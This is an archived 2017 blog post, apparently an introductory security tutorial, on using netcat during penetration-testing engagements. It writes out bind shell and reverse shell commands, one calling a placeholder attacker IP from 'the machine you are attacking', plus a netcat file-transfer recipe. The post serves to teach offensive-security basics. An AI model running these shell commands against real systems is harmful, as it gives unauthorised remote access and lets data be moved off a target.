💾 Archived View for cjc.im › 2017 › 12 › 29 › Infosec-Intro--Netcat-aka-nc › index.gmi captured on 2022-07-16 at 13:43:50. Gemini links have been rewritten to link to archived content
⬅️ Previous capture (2022-03-01)
-=-=-=-=-=-=-
Dec 29, 2017
This post I am going to focus on Netcat, the tcp/ip swiss army knife
Netcat is described as the swiss army knife of tcp/ip, it's great for setting up adhoc servers for a multitude of reasons
At some point in an engagement, you are going to want to send a file, setup a quick bind shell, or reverse shell. This is where nc will come in and be the savior your require. Even better, busybox, which is used in a lot of embedded environments, also has an implementation of netcat that will allow for some of these shenanigans.
The flags that I tend to use most often are:
To make a bind shell, that is a shell that listens on a port you can do:
nc -nlvp 1337 -e /bin/bash
Be aware this would allow someone to connect to port `1337` and have a shell as the user running the nc command. But what if the box you are able to run commands on is firewalled off? You can then 'send' a reverse shell back to a box you control.
On your machine listen for incoming connections:
nc -nlvp 1337
and then on the machine you are attacking
nc 1.2.3.4 1337 -e /bin/sh
which will 'send' the shell to you! great! You can also use `nc` to send a file to another machine, on the recieving machine:
nc -nlvp 1337 > incoming.file
and then on the sending machine
nc other.machines.public.ip < file.to.send
Sadly, there will be no progress, so you will have to verify this by other means that it has sent correctly.
TAGS:infosec,infosecintro